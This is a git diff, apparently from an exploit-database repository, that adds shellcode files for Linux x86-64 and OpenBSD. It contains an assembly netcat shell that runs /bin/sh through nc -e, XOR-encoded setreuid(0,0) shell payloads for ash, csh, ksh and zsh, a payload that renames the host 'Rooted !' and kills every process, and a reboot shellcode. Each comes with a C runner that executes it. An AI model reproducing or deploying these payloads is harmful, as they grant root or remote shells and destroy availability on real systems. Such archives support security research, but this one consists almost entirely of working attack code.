+push r10 +mov r10,rsp + +jmp short ip +continue: +pop r9 + +push rdx ;push NULL +push rcx ;push address of 'bin/sh' +push rbx ;push address of '-e' +push r10 ;push address of '1337' +push r9 ;push address of 'ip' +push rdi ;push address of '/bin/nc' + +mov rsi,rsp +mov al,59 +syscall + + +ip: + call continue + db "127.0.0.1" + + +;______________________bytecode_______________________ +;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63 +;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62 +;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1 +;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb +;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33 +;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11 +;\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89\xe6 +;\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e +;\x30\x2e\x30\x2e\x31 +;______________________bytecode_______________________ \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43603.c b/shellcodes/linux_x86-64/43603.c new file mode 100644 index 000000000..c68ad2ea0 --- /dev/null +++ b/shellcodes/linux_x86-64/43603.c @@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ash",NULL,NULL) + XOR encoded - 85 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\x7f\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x37\x4e\xbf\x37\xfc\xbf" +"\x0e\x37\x4e\x80\x37\x4e\x89\x70\x7a\x94\x6f\x37\x4e\xbf\x37" +"\xfc\xbf\x44\x20\x37\x4e\x89\x37\x4e\xad\x70\x7a\x97\x94\x80" +"\x80\x80\x50\x1d\x16\x11\x50\x1e\x0c\x17"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43604.c b/shellcodes/linux_x86-64/43604.c new file mode 100644 index 000000000..765b89b34 --- /dev/null +++ b/shellcodes/linux_x86-64/43604.c @@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/csh", ["/bin/csh", NULL]) + XOR encoded - 87 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\xe3\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\xab\xd2\x23\xab\x60\x23" +"\x92\xab\xd2\x1c\xab\xd2\x15\xec\xe6\x08\xf1\xab\xd2\x23\xab" +"\x60\x23\xd8\xbc\xab\xd2\x31\xb1\xb4\xab\x6a\x05\xec\xe6\x0b" +"\x0a\x1c\x1c\x1c\xcc\x81\x8a\x8d\xcc\x80\x90\x8b"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43605.c b/shellcodes/linux_x86-64/43605.c new file mode 100644 index 000000000..387db9434 --- /dev/null +++ b/shellcodes/linux_x86-64/43605.c @@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/ksh", ["/bin/ksh", NULL]) + XOR encoded - 87 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\x17\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x5f\x26\xd7\x5f\x94\xd7" +"\x66\x5f\x26\xe8\x5f\x26\xe1\x18\x12\xfc\x05\x5f\x26\xd7\x5f" +"\x94\xd7\x2c\x48\x5f\x26\xc5\x45\x40\x5f\x9e\xf1\x18\x12\xff" +"\xfe\xe8\xe8\xe8\x38\x75\x7e\x79\x38\x7c\x64\x7f"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43606.c b/shellcodes/linux_x86-64/43606.c new file mode 100644 index 000000000..4733fb2e4 --- /dev/null +++ b/shellcodes/linux_x86-64/43606.c @@ -0,0 +1,14 @@ +# Title: Linux x86-64 setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded - 87 bytes +# Author: egeektronic +# Twitter: @egeektronic +# Tested on: Slackware 13.37 +# Thanks: Mark Loiseau, entropy [at] phiral.net and metasm developer + +unsigned char shellcode[] = +"\x4d\x31\xc0\x41\xb1\x3c\xeb\x1a\x58\x48\x31\xc9\x48\x31\xdb" +"\x8a\x1c\x08\x4c\x39\xc3\x74\x10\x44\x30\xcb\x88\x1c\x08\x48" +"\xff\xc1\xeb\xed\xe8\xe1\xff\xff\xff\x74\x0d\xfc\x74\xbf\xfc" +"\x4d\x74\x0d\xc3\x74\x0d\xca\x33\x39\xd7\x2e\x74\x0d\xfc\x74" +"\xbf\xfc\x07\x63\x74\x0d\xee\x6e\x6b\x74\xb5\xda\x33\x39\xd4" +"\xd5\xc3\xc3\xc3\x13\x5e\x55\x52\x13\x46\x4f\x54"; +int main(void) { ((void (*)())shellcode)(); } \ No newline at end of file diff --git a/shellcodes/linux_x86-64/43607.c b/shellcodes/linux_x86-64/43607.c new file mode 100644 index 000000000..070a1cc4c --- /dev/null +++ b/shellcodes/linux_x86-64/43607.c @@ -0,0 +1,43 @@ +# Linux/x86_64 sethostname() & killall 33 bytes shellcode +# Date: 2010-04-26 +# Author: zbt +# Tested on: x86_64 Debian GNU/Linux + + +/* + ; sethostname("Rooted !"); + ; kill(-1, SIGKILL); + + + section .text + global _start + + _start: + + ;-- setHostName("Rooted !"); 22 bytes --; + mov al, 0xaa + mov r8, 'Rooted !' + push r8 + mov rdi, rsp + mov sil, 0x8 + syscall + + ;-- kill(-1, SIGKILL); 11 bytes --; + push byte 0x3e + pop rax + push byte 0xff + pop rdi + push byte 0x9 + pop rsi + syscall +*/ +int main(void) +{ + char shellcode[] = + "\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89" + "\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"; + + (*(void (*)()) shellcode)(); + + return 0; +} \ No newline at end of file diff --git a/shellcodes/openbsd_x86/43608.c b/shellcodes/openbsd_x86/43608.c new file mode 100644 index 000000000..8a8735ec7 --- /dev/null +++ b/shellcodes/openbsd_x86/43608.c @@ -0,0 +1,18 @@ +// ----------bsd/x86 reboot() shellcode----------------- + +// AUTHOR : beosroot +// INFO : OpenBSD x86 reboot() shellcode +// EMAIL : beosroot@null.net +// beosroot@hotmail.fr + + +char shellcode[] = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; + +int main() { + + int *ret = (int *)&ret + 2; + (*ret) = (int)shellcode; +} + + +// the end o.O \ No newline at end of file